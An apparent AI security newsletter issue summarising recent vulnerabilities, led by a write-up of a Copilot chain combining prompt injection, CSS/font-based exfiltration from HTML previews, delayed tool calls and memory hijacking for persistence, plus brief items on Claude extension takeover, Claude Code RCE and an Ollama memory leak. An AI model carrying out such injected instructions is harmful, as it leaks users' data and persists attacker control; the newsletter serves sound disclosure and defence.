M365 Copilot CVE-2026-24299: Preview to Exfiltration and Persistence
M365 Copilot CVE-2026-24299: Preview to Exfiltration and Persistence
AI Sec News Weekly #8 — 190 sources scanned
In AI systems, ‘read-only’ is rarely read-only. Anything the model can see now can influence what it says or does later — through memory, scheduled actions, or tool calls. That means previews and embeds aren’t passive; they’re inputs with delayed side effects.
I like a simple model: content plane, memory plane, tool plane. Whenever two touch, you’ve created a write. One team learned that the hard way in Copilot this week, where a seemingly harmless viewer turned into both a quiet exfil path and a place to stick around. If “read” equals “write later,” where does the trust boundary actually live? Dive in below.
This Week's Stories
Copirate 365: CVE-2026-24299 Chains Copilot Exfiltration and Persistence
Wunderwuzzi's DEF CON Singapore write-up details CVE-2026-24299 across M365 Copilot, chaining HTML Preview exfil (CSS backgrounds, @font-face) with delayed tool invocation and memory hijacking. The primitives turn Copilot into "SpAIware": prompt-set persistence plus data theft. The post also shows Consumer Copilot Durable Facts abuse and Edge-assisted exfil, with videos and slides. Microsoft patched the issues via MSRC last year.
Why it matters: Once an assistant remembers, prompt injection stops being a one-off leak and becomes durable compromise.
Embrace the Red by wunderwuzzi
Bleeding Llama: CVE-2026-7482 Leaks Ollama Process Memory Remotely
Cyera detailed CVE-2026-7482 ("Bleeding Llama"), a heap out-of-bounds read in Ollama's GGUF model loader affecting versions before 0.17.1 (CVSS 9.1). An unauthenticated attacker can POST a crafted GGUF to /api/create to read past heap buffers due to unsafe use in WriteTo(), then exfiltrate the resulting artifact via /api/push. The leak exposes Ollama process memory—env vars, API keys, system prompts, even other users' chats—across an estimated 300k+ exposed servers.
Why it matters: The "local" LLM stack becomes a turnkey secrets siphon the moment it’s on the internet.
Copy Fail: Deterministic Linux LPE Hits Kernels 4.14–6.19.12
Researchers profiled CVE-2026-31431 ("Copy Fail"), a deterministic Linux kernel LPE in algif_aead via AF_ALG that writes four attacker-controlled bytes into the page cache. Kernels 4.14–6.19.12 across Ubuntu, Amazon Linux, RHEL, Debian, SUSE and AlmaLinux are affected. A 732-byte Python exploit reliably flips privileged executables (su/sudo) in memory, enabling container escape, multi-tenant host takeover and CI/CD compromise. Disclosure landed Apr 29, 2026; vendor kernel updates are rolling out.
Why it matters: Any foothold inside a pod now predictably escalates to root on the node, collapsing your isolation story.
Unit 42 by Justin Moore
Tool Spotlight
New repos and releases worth trying.
Snyk Embeds Anthropic's Claude into its AI security platform
Snyk today announced it is leveraging Anthropic's Claude models to help secure software pipelines in an era where frontier AI expands the attack surface faster than teams can manually review. Claude now powers vulnerability discovery, prioritization, and developer-ready remediation across code, open-source dependencies, containers, and AI-generated artifacts.
Why it matters: In AI security, detection was never the bottleneck. By pairing Claude's capabilities with Snyk, enterprises can turn high-fidelity findings into action inside the workflows where software is built.
ARuleCon uses agentic RAG to translate SIEM rules across vendors
Researchers at NUS and Fudan built ARuleCon, a rule‑conversion pipeline that pulls authoritative vendor docs via agentic RAG and sanity‑checks outputs with Python by executing source and target rules in test rigs. It targets Splunk, Microsoft Sentinel, IBM QRadar, Google Chronicle, and RSA NetWitness. The team argues vanilla LLM translation misses vendor‑specific schemas; ARuleCon closes that with retrieval plus consistency tests.
Why it matters: Detection portability stops being hand‑conversion toil, which cuts the silent breakage that creeps in whenever SOCs juggle multiple SIEMs.
The Register Security by Simon Sharwood
LLMForge: build hostile labs for prompt‑injection and agent exploits
SasanLabs dropped LLMForge, an open‑source “AI security gateway” for assembling dynamic LLM vulnerability labs. It’s pitched at prompt‑injection research, exploit simulation, and agent attack experimentation, with a modular gateway model rather than loose notebooks. The repo is very early (5 stars) and light on stack details; language/framework aren’t documented yet, but the use case is clear: stand up a controlled arena to hammer tool‑using agents with untrusted content.
Why it matters: A shared, purpose‑built harness makes adversarial LLM behaviors reproducible and comparable instead of one‑off demos.
GitLab adds Human‑in‑the‑Loop approval nodes to AI Custom Flows
GitLab’s Duo Agent Platform now lets you drop Human‑in‑the‑Loop checkpoints into AI Custom Flows, pausing runs to Approve, Reject, or Modify from the session view. Approvals route and notify through GitLab’s existing systems, adding auditability to agent decisions. It’s aimed at high‑stakes steps—think production deploys or secret rotations—that previously ran uninterrupted.
Why it matters: When the brake pedal lives inside the orchestrator, “autonomous” agents become deployable in places they were previously a non‑starter.
Quick Hits
- Claude Chrome extension bug allows agent takeover (SecurityWeek) — LayerX’s ‘ClaudeBleed’ lets zero‑perm extensions hijack Claude’s Chrome extension and exfiltrate Gmail/Drive/GitHub; Anthropic shipped a partial fix.
- One-click RCE in Claude Code via settings files (The Register Security) — Adversa AI’s TrustFall PoC shows one‑click RCE in Claude Code via malicious .mcp.json/.claude settings (tested on v2.1.114).
- CVSS 10 supply-chain compromise hits gemini-cli package (Pillar Security) — gemini-cli was trojanized in a CVSS 10 supply‑chain attack, per GHSA‑wpqr‑6v78‑jr5g.
- Agent VCR adds time-travel debugging for LLM agents (github.com) — Open‑source Agent VCR lets you rewind, edit state, and resume LLM agent runs.
- LoRA prompt-injection detector released on Hugging Face (Hugging Face) — New LoRA on Qwen3‑0.6B targets prompt‑injection detection (abedegno/prompt‑injection‑classifier‑qwen3‑0p6b).